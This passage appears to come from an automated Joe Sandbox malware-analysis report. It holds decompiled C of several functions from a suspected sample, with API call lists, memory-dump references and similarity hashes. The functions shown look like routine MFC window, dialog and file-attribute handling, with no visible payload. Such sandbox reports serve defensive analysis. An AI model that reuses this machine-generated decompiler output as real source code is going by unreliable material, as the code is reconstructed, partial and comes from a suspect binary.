					__eflags =  *(_t198 + 0x24) & 0x00000401;
					if(( *(_t198 + 0x24) & 0x00000401) == 0) {
						L78:
						 *[fs:0x0] =  *((intOrPtr*)(_t215 - 0xc));
						return _t116;
					}
					_push( *_t167);
					while(1) {
						_t116 = E00413740(_t215);
						__eflags = _t116;
						if(_t116 == 0) {
							break;
						}
						__eflags = _t116 - _t198;
						if(_t116 == _t198) {
							L57:
							__eflags = _t208 - 0x100;
							if(_t208 < 0x100) {
								L59:
								__eflags = _t208 - 0x104;
								if(_t208 < 0x104) {
									L62:
									_t116 = 0;
									__eflags = 0;
									L63:
									__eflags =  *(_t198 + 0x25) & 0x00000004;
									if(( *(_t198 + 0x25) & 0x00000004) != 0) {
										goto L78;
									}
									__eflags = _t116;
									if(_t116 != 0) {
										L77:
										_t116 = E00414026(_t116);
										goto L78;
									}
									__eflags = _t208 - 0x201;
									if(_t208 == 0x201) {
										goto L77;
									}
									__eflags = _t208 - 0x203;
									if(_t208 == 0x203) {
										goto L77;
									}
									__eflags = _t208 - 0x204;
									if(_t208 == 0x204) {
										goto L77;
									}
									__eflags = _t208 - 0x206;
									if(_t208 == 0x206) {
										goto L77;
									}
									__eflags = _t208 - 0x207;
									if(_t208 == 0x207) {
										goto L77;
									}
									__eflags = _t208 - 0x209;
									if(_t208 == 0x209) {
										goto L77;
									}
									__eflags = _t208 - 0xa1;
									if(_t208 == 0xa1) {
										goto L77;
									}
									__eflags = _t208 - 0xa3;
									if(_t208 == 0xa3) {
										goto L77;
									}
									__eflags = _t208 - 0xa4;
									if(_t208 == 0xa4) {
										goto L77;
									}
									__eflags = _t208 - 0xa6;
									if(_t208 == 0xa6) {
										goto L77;
									}
									__eflags = _t208 - 0xa7;
									if(_t208 == 0xa7) {
										goto L77;
									}
									__eflags = _t208 - 0xa9;
									if(_t208 != 0xa9) {
										goto L78;
									}
									goto L77;
								}
								__eflags = _t208 - 0x107;
								if(_t208 > 0x107) {
									goto L62;
								}
								L61:
								_t116 = 1;
								goto L63;
							}
							__eflags = _t208 - 0x108;
							if(_t208 <= 0x108) {
								goto L61;
							}
							goto L59;
						}
						__eflags =  *(_t116 + 0x24) & 0x00000401;
						if(( *(_t116 + 0x24) & 0x00000401) != 0) {
							break;
						}
						_push(GetParent( *(_t116 + 0x1c)));
					}
					__eflags = _t116 - _t198;
					if(_t116 != _t198) {
						goto L78;
					}
					goto L57;
				}
			}

0x00410e0a
0x00410e0f
0x00410e13
0x00410e18
0x00410e1b
0x00410e23
0x00410e26
0x00410e29
0x00410e57
0x00410e5c
0x0041118f
0x0041118f
0x00000000
0x0041118f
0x00410e64
0x00410e69
0x00000000
0x00000000
0x00410e71
0x00410e76
0x00000000
0x00410e7c
0x00410e7c
0x00410e7e
0x00410e7e
0x00410e85
0x00410e98
0x00000000
0x00410e98
0x00410e9b
0x00410e9d
0x00410ed8
0x00410edc
0x00410edf
0x00410ee5
0x00410eea
0x00410eec
0x00410eef
0x00410f19
0x00410f1b
0x00410f21
0x00410f24
0x00410f26
0x00410f28
0x00410f2b
0x00410f34
0x00410f34
0x00410f36
0x00410f3a
0x00410f41
0x00410f46
0x00410f48
0x00410f6c
0x00410f72
0x00410f75
0x00410f7b
0x00410f83
0x00410f88
0x00410f8b
0x00410f8e
0x00410f91
0x00410f97
0x00410fa6
0x00410fb0
0x00410fb6
0x00410fb8
0x00410fc8
0x00410fc8
0x00410fce
0x00410fd7
0x00410fde
0x00410fe4
0x00410ff2
0x00410ff7
0x00410fff
0x0041100f
0x00411014
0x0041101a
0x0041101c
0x0041101e
0x00411024
0x00411027
0x0041107b
0x0041107b
0x0041107e
0x00411187
0x00411116
0x0041111a
0x0041111f
0x00411126
0x00411126
0x0041112c
0x00411139
0x00411139
0x00411144
0x0041114d
0x00411153
0x00411157
0x00000000
0x00411157
0x00411089
0x00411095
0x00411095
0x00411097
0x0041109f
0x004110a2
0x004110a5
0x004110a7
0x004110a7
0x004110a9
0x004110a9
0x004110bb
0x004110c1
0x004110c5
0x004110d3
0x004110de
0x004110e4
0x004110e7
0x004110ea
0x004110fa
0x004110fa
0x0041110d
0x00000000
0x004110c7
0x004110ca
0x004110cf
0x004110d1
0x00411113
0x00411113
0x00000000
0x00411113
0x00000000
0x004110d1
0x00411029
0x00411029
0x0041102f
0x00000000
0x00000000
0x00411031
0x00411035
0x00411064
0x00411067
0x00411071
0x00411071
0x00411037
0x0041103b
0x00411059
0x00411059
0x00411159
0x00411159
0x0041115d
0x00411163
0x00411167
0x00411170
0x00411175
0x00411167
0x00000000
0x0041115d
0x00410f4a
0x00410f4a
0x00410f4c
0x00410f58
0x00410f58
0x00000000
0x00410f4c
0x00410f48
0x00410ef3
0x00410ef8
0x00410efb
0x00410f01
0x00410f0a
0x00410f0d
0x00410f0d
0x00410f0f
0x00410f0f
0x00410f15
0x00410f17
0x00000000
0x00000000
0x00000000
0x00000000
0x00410e9f
0x00410e9f
0x00410ea1
0x00410eb1
0x00410eb6
0x00410ebd
0x00410ebd
0x00000000
0x00410ea1
0x00410e9d
0x00411192
0x00411192
0x00411192
0x00411198
0x00411260
0x00411266
0x0041126e
0x0041126e
0x0041119e
0x004111a0
0x004111a0
0x004111a5
0x004111a7
0x00000000
0x00000000
0x004111a9
0x004111ab
0x004111c9
0x004111c9
0x004111cf
0x004111d9
0x004111d9
0x004111df
0x004111ee
0x004111ee
0x004111ee
0x004111f0
0x004111f0
0x004111f4
0x00000000
0x00000000
0x004111f6
0x004111f8
0x0041125a
0x0041125b
0x00000000
0x0041125b
0x004111fa
0x00411200
0x00000000
0x00000000
0x00411202
0x00411208
0x00000000
0x00000000
0x0041120a
0x00411210
0x00000000
0x00000000
0x00411212
0x00411218
0x00000000
0x00000000
0x0041121a
0x00411220
0x00000000
0x00000000
0x00411222
0x00411228
0x00000000
0x00000000
0x0041122a
0x00411230
0x00000000
0x00000000
0x00411232
0x00411238
0x00000000
0x00000000
0x0041123a
0x00411240
0x00000000
0x00000000
0x00411242
0x00411248
0x00000000
0x00000000
0x0041124a
0x00411250
0x00000000
0x00000000
0x00411252
0x00411258
0x00000000
0x00000000
0x00000000
0x00411258
0x004111e1
0x004111e7
0x00000000
0x00000000
0x004111e9
0x004111eb
0x00000000
0x004111eb
0x004111d1
0x004111d7
0x00000000
0x00000000
0x00000000
0x004111d7
0x004111ad
0x004111b3
0x00000000
0x00000000
0x004111be
0x004111be
0x004111c1
0x004111c3
0x00000000
0x00000000
0x00000000
0x004111c3

APIs

__EH_prolog.LIBCMT ref: 00410E0A
GetKeyState.USER32(00000001), ref: 00410E57
GetKeyState.USER32(00000002), ref: 00410E64
GetKeyState.USER32(00000004), ref: 00410E71
GetParent.USER32(?), ref: 00410E92
SendMessageA.USER32(?,00000401,00000000,00000000), ref: 00410F6C
SendMessageA.USER32(?,00000408,00000000,?), ref: 00410FB0
SendMessageA.USER32(?,00000404,00000000,00000028), ref: 00410FC8
ScreenToClient.USER32 ref: 00410FE4
GetCursorPos.USER32(?), ref: 0041103B
SendMessageA.USER32(?,00000412,00000000,?), ref: 00411059
SendMessageA.USER32(?,00000404,00000000,00000028), ref: 004110BB
SendMessageA.USER32(?,00000401,00000001,00000000), ref: 004110DE
SendMessageA.USER32(?,00000411,00000001,00000028), ref: 004110FA
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0041110D
SendMessageA.USER32(?,00000405,00000000,000000D8), ref: 00411139
SendMessageA.USER32(?,00000401,00000000,00000000), ref: 00411187
GetParent.USER32(?), ref: 004111B8

Strings

(, xrefs: 00410F97
@, xrefs: 004110C1
(, xrefs: 00410FFF

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageSend$State$Parent$ClientCursorH_prologScreenWindow
String ID: ($($@
API String ID: 986702660-2846432479
Opcode ID: ab6ad478d167d425a8f5397958138efc83b875242002b165a4e8ad6ee90b50b5
Instruction ID: 13d5465373c71cfe337dff1ba131fcf840a9d493356aa9c13fb6cf6503e8bb35
Opcode Fuzzy Hash: ab6ad478d167d425a8f5397958138efc83b875242002b165a4e8ad6ee90b50b5
Instruction Fuzzy Hash: 00C1A671A00315ABDF249F94CC85BEEBB75AF08704F10412BEB15BB2E1D7B898C58B59

Uniqueness

Uniqueness Score: -1.00%

Function 00412121, Relevance: 13.6, APIs: 9, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00412121(intOrPtr* __ecx) {
				void* __esi;
				signed int _t40;
				struct HWND__* _t44;
				signed int _t48;
				signed char _t53;
				struct HWND__* _t55;
				struct HINSTANCE__* _t60;
				void* _t62;
				void* _t73;
				intOrPtr* _t77;
				void* _t79;
				void* _t81;

				E00406520(E00429CE8, _t79);
				_t77 = __ecx;
				 *((intOrPtr*)(_t79 - 0x10)) = _t81 - 0x18;
				 *((intOrPtr*)(_t79 - 0x1c)) = __ecx;
				_t73 =  *(__ecx + 0x44);
				 *(_t79 - 0x18) =  *(__ecx + 0x48);
				_t40 = E00424BFB();
				_t60 =  *(_t40 + 0xc);
				if( *(_t77 + 0x40) != 0) {
					_t60 =  *(E00424BFB() + 0xc);
					_t40 = LoadResource(_t60, FindResourceA(_t60,  *(_t77 + 0x40), 5));
					_t73 = _t40;
				}
				if(_t73 != 0) {
					_t40 = LockResource(_t73);
					 *(_t79 - 0x18) = _t40;
				}
				if( *(_t79 - 0x18) != 0) {
					 *(_t79 - 0x14) = E004120A5(_t77);
					E00413C3E();
					__eflags =  *(_t79 - 0x14);
					 *(_t79 - 0x20) = 0;
					if( *(_t79 - 0x14) != 0) {
						_t55 = IsWindowEnabled( *(_t79 - 0x14));
						__eflags = _t55;
						if(_t55 != 0) {
							EnableWindow( *(_t79 - 0x14), 0);
							 *(_t79 - 0x20) = 1;
						}
					}
					_push(_t77);
					 *(_t79 - 4) = 0;
					"VWh\rDB"();
					_t44 = E00411E32(_t77,  *(_t79 - 0x18), E00413740(_t79,  *(_t79 - 0x14)), _t60);
					__eflags = _t44;
					if(_t44 != 0) {
						__eflags =  *(_t77 + 0x24) & 0x00000010;
						if(( *(_t77 + 0x24) & 0x00000010) != 0) {
							_t62 = 4;
							_t53 = E00416528(_t77);
							__eflags = _t53 & 0x00000001;
							if((_t53 & 0x00000001) != 0) {
								_t62 = 5;
							}
							_push(_t62);
							E00415F1B(_t77);
						}
						__eflags =  *(_t77 + 0x1c);
						if( *(_t77 + 0x1c) != 0) {
							E0041663D(_t77, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
					__eflags =  *(_t79 - 0x20);
					if( *(_t79 - 0x20) != 0) {
						EnableWindow( *(_t79 - 0x14), 1);
					}
					__eflags =  *(_t79 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t77 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t79 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t77 + 0x58))();
					E004120DF(_t77, _t77, __eflags);
					_t48 =  *(_t77 + 0x2c);
				} else {
					_t48 = _t40 | 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
				return _t48;
			}

0x00412126
0x00412130
0x00412133
0x00412136
0x0041213c
0x0041213f
0x00412142
0x0041214b
0x0041214e
0x00412155
0x00412166
0x0041216c
0x0041216c
0x00412170
0x00412173
0x00412179
0x00412179
0x00412180
0x00412191
0x00412194
0x0041219b
0x0041219e
0x004121a1
0x004121a6
0x004121ac
0x004121ae
0x004121b4
0x004121ba
0x004121ba
0x004121ae
0x004121c1
0x004121c2
0x004121c5
0x004121d9
0x004121de
0x004121e0
0x004121e2
0x004121e6
0x004121ec
0x004121ed
0x004121f2
0x004121f5
0x004121f9
0x004121f9
0x004121fa
0x004121fd
0x004121fd
0x00412202
0x00412205
0x00412213
0x00412213
0x00412205
0x00412234
0x00412238
0x0041223b
0x00412242
0x00412242
0x00412248
0x0041224b
0x00412253
0x00412256
0x0041225b
0x0041225b
0x00412256
0x00412265
0x0041226a
0x0041226f
0x00412182
0x00412182
0x00412182
0x00412277
0x00412280

APIs

__EH_prolog.LIBCMT ref: 00412126
FindResourceA.KERNEL32(?,00000000,00000005), ref: 0041215E
LoadResource.KERNEL32(?,00000000), ref: 00412166

Part of subcall function 00413C3E: UnhookWindowsHookEx.USER32(?), ref: 00413C63

LockResource.KERNEL32(?), ref: 00412173
IsWindowEnabled.USER32(?), ref: 004121A6
EnableWindow.USER32(?,00000000), ref: 004121B4
EnableWindow.USER32(?,00000001), ref: 00412242
GetActiveWindow.USER32 ref: 0041224D
SetActiveWindow.USER32(?), ref: 0041225B

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
String ID:
API String ID: 401145483-0
Opcode ID: 7015d410af779c90a7d9a4b6f66a6dc9d9dc78ce1a3fb9c656cf5ce14bf6b1e4
Instruction ID: 29e84b16fa1c15ce6d6e5a6389cc251cef0e56d6ff14e1849cc81362d4330516
Opcode Fuzzy Hash: 7015d410af779c90a7d9a4b6f66a6dc9d9dc78ce1a3fb9c656cf5ce14bf6b1e4
Instruction Fuzzy Hash: 0841C331A00604AFCB21AF65CA45AEFBBB5FF44715F10011FF502E2291CBB99D91CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00417B29, Relevance: 12.1, APIs: 8, Instructions: 72
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00417B29() {
				CHAR* _t29;
				CHAR* _t36;
				void* _t38;
				CHAR* _t47;
				void* _t53;

				E00406520(E0042A77C, _t53);
				_t47 =  *(_t53 + 8);
				if(GetFullPathNameA( *(_t53 + 0xc), 0x104, _t47, _t53 - 0x14) != 0) {
					_t29 =  *0x436980; // 0x436994
					 *(_t53 + 8) = _t29;
					_push(_t53 + 8);
					 *(_t53 - 4) = 0;
					E00417BF9(_t53, _t47);
					if(GetVolumeInformationA( *(_t53 + 8), 0, 0, 0, _t53 - 0x18, _t53 - 0x10, 0, 0) != 0) {
						if(( *(_t53 - 0x10) & 0x00000002) == 0) {
							CharUpperA(_t47);
						}
						if(( *(_t53 - 0x10) & 0x00000004) == 0) {
							_t38 = FindFirstFileA( *(_t53 + 0xc), _t53 - 0x158);
							if(_t38 != 0xffffffff) {
								FindClose(_t38);
								lstrcpyA( *(_t53 - 0x14), _t53 - 0x12c);
							}
						}
						_push(1);
						_pop(0);
					}
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					E00416AEC(_t53 + 8);
					_t36 = 0;
				} else {
					lstrcpynA(_t47,  *(_t53 + 0xc), 0x104);
					_t36 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t36;
			}

0x00417b2e
0x00417b3b
0x00417b54
0x00417b68
0x00417b6d
0x00417b75
0x00417b77
0x00417b7a
0x00417b97
0x00417b9d
0x00417ba0
0x00417ba0
0x00417baa
0x00417bb6
0x00417bbf
0x00417bc2
0x00417bd2
0x00417bd2
0x00417bbf
0x00417bd8
0x00417bda
0x00417bda
0x00417bdb
0x00417be2
0x00417be7
0x00417b56
0x00417b5b
0x00417b61
0x00417b61
0x00417bee
0x00417bf6

APIs

__EH_prolog.LIBCMT ref: 00417B2E
GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 00417B4C
lstrcpynA.KERNEL32(?,?,00000104), ref: 00417B5B
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00417B8F
CharUpperA.USER32(?), ref: 00417BA0
FindFirstFileA.KERNEL32(?,?), ref: 00417BB6
FindClose.KERNEL32(00000000), ref: 00417BC2
lstrcpyA.KERNEL32(?,?), ref: 00417BD2

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
String ID:
API String ID: 304730633-0
Opcode ID: 261e5bd0cefbd8535663fbc44468f2c19afaa9a971ae4ca057a15bc10e8a79cd
Instruction ID: d6ea0ce2269d815b5d4983ac84d4510317191ca485f23a24ef5020b763cd6ff7
Opcode Fuzzy Hash: 261e5bd0cefbd8535663fbc44468f2c19afaa9a971ae4ca057a15bc10e8a79cd
Instruction Fuzzy Hash: 71215C71A04119ABCB209F61DC48EEF7F7CEF05768F008166F919E61A0D7349A46CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041E95F, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160
keyboardtimeCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0041E95F(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				struct tagPOINT _v28;
				intOrPtr _v36;
				signed char _v65;
				char _v72;
				void* _t58;
				void* _t60;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr* _t113;

				_t110 = _a4;
				_t113 = __ecx;
				if(E00414007(__ecx, _t110) != 0) {
					L38:
					_t58 = 1;
					return _t58;
				}
				_t111 =  *((intOrPtr*)(_t110 + 4));
				_v20 = E00404FFE(__ecx);
				if(( *(__ecx + 0x64) & 0x00000020) != 0 || _t111 == 0x201 || _t111 == 0x202) {
					if(_t111 < 0x200 || _t111 > 0x209) {
						if(_t111 < 0xa0 || _t111 > 0xa9) {
							goto L30;
						} else {
							goto L8;
						}
					} else {
						L8:
						_v16 = E004249C4();
						_t67 = _a4;
						_v28.y =  *((intOrPtr*)(_t67 + 0x18));
						_v28.x =  *(_t67 + 0x14);
						ScreenToClient( *(_t113 + 0x1c),  &_v28);
						E00406330( &_v72, 0, 0x2c);
						_v72 = 0x28;
						_v8 =  *((intOrPtr*)( *_t113 + 0x64))(_v28.x, _v28.y,  &_v72);
						if(_v36 != 0xffffffff) {
							E004062E0(_v36);
						}
						if(_t111 != 0x201 || (_v65 & 0x00000080) == 0) {
							_v12 = _v12 & 0x00000000;
							if(_t111 != 0x201 && GetKeyState(1) < 0) {
								_v8 =  *((intOrPtr*)(_v16 + 0x104));
							}
						} else {
							_v12 = 1;
						}
						if(_v8 < 0 || _v12 != 0) {
							if(GetKeyState(1) >= 0 || _v12 != 0) {
								 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
								KillTimer( *(_t113 + 0x1c), 0xe001);
							}
							goto L29;
						} else {
							if(_t111 != 0x202) {
								if(( *(_t113 + 0x60) & 0x00000008) != 0 || GetKeyState(1) < 0) {
									 *((intOrPtr*)( *_t113 + 0xdc))(_v8);
								} else {
									if(_v8 ==  *((intOrPtr*)(_v16 + 0x104))) {
										L29:
										 *((intOrPtr*)(_v16 + 0x104)) = _v8;
										goto L30;
									}
									_push(0x12c);
									_push(0xe000);
									L20:
									E0041E722(_t113);
								}
								goto L29;
							}
							 *((intOrPtr*)( *_t113 + 0xdc))(0xffffffff);
							_push(0xc8);
							_push(0xe001);
							goto L20;
						}
					}
				} else {
					L30:
					_t60 = E00414DCC(_t113);
					if(_t60 == 0 ||  *((intOrPtr*)(_t60 + 0x50)) == 0) {
						if(_v20 == 0) {
							L36:
							return E00415EEB(_a4);
						} else {
							goto L34;
						}
						while(1) {
							L34:
							_t112 = _v20;
							_push(_a4);
							if( *((intOrPtr*)( *_v20 + 0x90))() != 0) {
								goto L38;
							}
							_t64 = E00414C6C(_t112);
							_v20 = _t64;
							if(_t64 != 0) {
								continue;
							}
							goto L36;
						}
						goto L38;
					} else {
						return 0;
					}
				}
			}

0x0041e967
0x0041e96a
0x0041e974
0x0041eb53
0x0041eb55
0x00000000
0x0041eb55
0x0041e97a
0x0041e989
0x0041e991
0x0041e9a9
0x0041e9b9
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e9cb
0x0041e9cb
0x0041e9d0
0x0041e9d3
0x0041e9dc
0x0041e9e3
0x0041e9e9
0x0041e9f7
0x0041ea04
0x0041ea1b
0x0041ea1e
0x0041ea23
0x0041ea28
0x0041ea2b
0x0041ea3c
0x0041ea42
0x0041ea5a
0x0041ea5a
0x0041ea33
0x0041ea33
0x0041ea33
0x0041ea61
0x0041ead7
0x0041eae5
0x0041eaf3
0x0041eaf3
0x00000000
0x0041ea69
0x0041ea6f
0x0041ea94
0x0041eac4
0x0041eaa3
0x0041eaaf
0x0041eaf9
0x0041eaff
0x00000000
0x0041eaff
0x0041eab1
0x0041eab6
0x0041ea87
0x0041ea89
0x0041ea89
0x00000000
0x0041ea94
0x0041ea77
0x0041ea7d
0x0041ea82
0x00000000
0x0041ea82
0x0041ea61
0x0041eb05
0x0041eb05
0x0041eb07
0x0041eb0f
0x0041eb1f
0x0041eb43
0x00000000
0x00000000
0x00000000
0x00000000
0x0041eb21
0x0041eb21
0x0041eb21
0x0041eb24
0x0041eb33
0x00000000
0x00000000
0x0041eb37
0x0041eb3e
0x0041eb41
0x00000000
0x00000000
0x00000000
0x0041eb41
0x00000000
0x0041eb17
0x00000000
0x0041eb17
0x0041eb0f

APIs

Part of subcall function 00404FFE: GetParent.USER32(?), ref: 00405008

ScreenToClient.USER32 ref: 0041E9E9
GetKeyState.USER32(00000001), ref: 0041EA46
GetKeyState.USER32(00000001), ref: 0041EA98
GetKeyState.USER32(00000001), ref: 0041EACE
KillTimer.USER32(?,0000E001), ref: 0041EAF3

Strings

(, xrefs: 0041EA04

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: State$ClientKillParentScreenTimer
String ID: (
API String ID: 2757461879-3887548279
Opcode ID: aba9d6d1a86e02e609d0b99a16c65b662d614ef0cbda091ee331dfe992392d8b
Instruction ID: 933066e1b9ae1ffc9999b2effe157d6391a28475e321b0032f1d86925bea9953
Opcode Fuzzy Hash: aba9d6d1a86e02e609d0b99a16c65b662d614ef0cbda091ee331dfe992392d8b
Instruction Fuzzy Hash: 09518179A00205DBDF24DB96C488BEE7BB1AF44354F14006AED16A72D1C7B869C2CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00418C88, Relevance: 10.6, APIs: 7, Instructions: 148
timeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00418C88(void* __ecx) {
				void* __esi;
				void* _t60;
				CHAR* _t83;
				void* _t95;
				struct _SECURITY_DESCRIPTOR* _t101;
				signed int _t102;
				void* _t120;
				CHAR** _t124;
				void* _t126;

				E00406520(E00429FC8, _t126);
				_t120 = __ecx;
				_t124 = __ecx + 0x10;
				E00416A77(_t124, _t124);
				if(( *(_t126 + 0xd) & 0x00000010) != 0 && E004182CC( *(_t126 + 8), _t126 - 0x150) != 0) {
					_t83 =  *0x436980; // 0x436994
					 *(_t126 - 0x10) = _t83;
					_t102 = 0;
					_push(_t126 - 0x10);
					 *(_t126 - 4) = 0;
					E00417BF9(_t126,  *(_t126 + 8));
					if(GetDiskFreeSpaceA( *(_t126 - 0x10), _t126 - 0x24, _t126 - 0x20, _t126 - 0x1c, _t126 - 0x28) != 0) {
						_t102 =  *(_t126 - 0x24) *  *(_t126 - 0x20) *  *(_t126 - 0x1c);
					}
					_t91 =  *((intOrPtr*)(_t126 - 0x144));
					_t136 = _t102 -  *((intOrPtr*)(_t126 - 0x144)) + _t91;
					if(_t102 >  *((intOrPtr*)(_t126 - 0x144)) + _t91) {
						_push(1);
						_push( *(_t126 + 8));
						_push(_t126 - 0x14);
						_t95 = E00418BE2(_t136);
						 *(_t126 - 4) = 1;
						E00416B95(_t124, _t126, _t95);
						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
						E00416AEC(_t126 - 0x14);
					}
					 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
					E00416AEC(_t126 - 0x10);
				}
				_t58 =  *_t124;
				if( *((intOrPtr*)( *_t124 - 8)) == 0 || E004177BD(_t120, _t58,  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10))) == 0) {
					E00416A77(_t124, _t124);
					_t60 = E004177BD(_t120,  *(_t126 + 8),  *(_t126 + 0xc),  *((intOrPtr*)(_t126 + 0x10)));
				} else {
					E00416BE5(_t120 + 0xc,  *(_t126 + 8));
					if(GetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38) != 0) {
						E0041837E(_t126 - 0x150, _t126 - 0x18);
						SetFileTime( *(_t120 + 4), _t126 - 0x18, _t126 - 0x30, _t126 - 0x38);
					}
					 *(_t126 + 0xc) = 0;
					if(GetFileSecurityA( *(_t126 + 8), 4, 0, 0, _t126 + 0xc) != 0) {
						_t101 = E004131DD( *(_t126 + 0xc));
						if(GetFileSecurityA( *(_t126 + 8), 4, _t101,  *(_t126 + 0xc), _t126 + 0xc) != 0) {
							SetFileSecurityA( *_t124, 4, _t101);
						}
						E00413206(_t101);
					}
					_t60 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
				return _t60;
			}

0x00418c8d
0x00418c9b
0x00418c9d
0x00418ca2
0x00418cab
0x00418cc8
0x00418ccd
0x00418cd3
0x00418cd5
0x00418cd6
0x00418cdc
0x00418cfc
0x00418d05
0x00418d05
0x00418d09
0x00418d11
0x00418d13
0x00418d15
0x00418d1a
0x00418d1d
0x00418d1e
0x00418d29
0x00418d2d
0x00418d32
0x00418d39
0x00418d39
0x00418d3e
0x00418d45
0x00418d45
0x00418d4a
0x00418d51
0x00418e09
0x00418e19
0x00418d6d
0x00418d73
0x00418d8f
0x00418d9c
0x00418db2
0x00418db2
0x00418dc9
0x00418dd0
0x00418dda
0x00418dee
0x00418df5
0x00418df5
0x00418dfc
0x00418e01
0x00418e04
0x00418e04
0x00418e24
0x00418e2c

APIs

__EH_prolog.LIBCMT ref: 00418C8D
GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?,?,?), ref: 00418CF4
GetFileTime.KERNEL32(?,?,?,?,?), ref: 00418D87
SetFileTime.KERNEL32(?,?,?,?), ref: 00418DB2
GetFileSecurityA.ADVAPI32(?,00000004,00000000,00000000,?), ref: 00418DCC
GetFileSecurityA.ADVAPI32(?,00000004,00000000,?,?), ref: 00418DEA
SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00418DF5

Part of subcall function 00417BF9: lstrcpynA.KERNEL32(00000000,?,00000104,?,?), ref: 00417C20

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: File$Security$Time$DiskFreeH_prologSpacelstrcpyn
String ID:
API String ID: 726943650-0
Opcode ID: 151eda710a63fa4e8bb76486b1b12dbcba71fe74a8807c483a8701459e66d7e6
Instruction ID: be22718d3dfdaed04fc9161a777cdf82254a032ef9ddc828293ac01cd1254a92
Opcode Fuzzy Hash: 151eda710a63fa4e8bb76486b1b12dbcba71fe74a8807c483a8701459e66d7e6
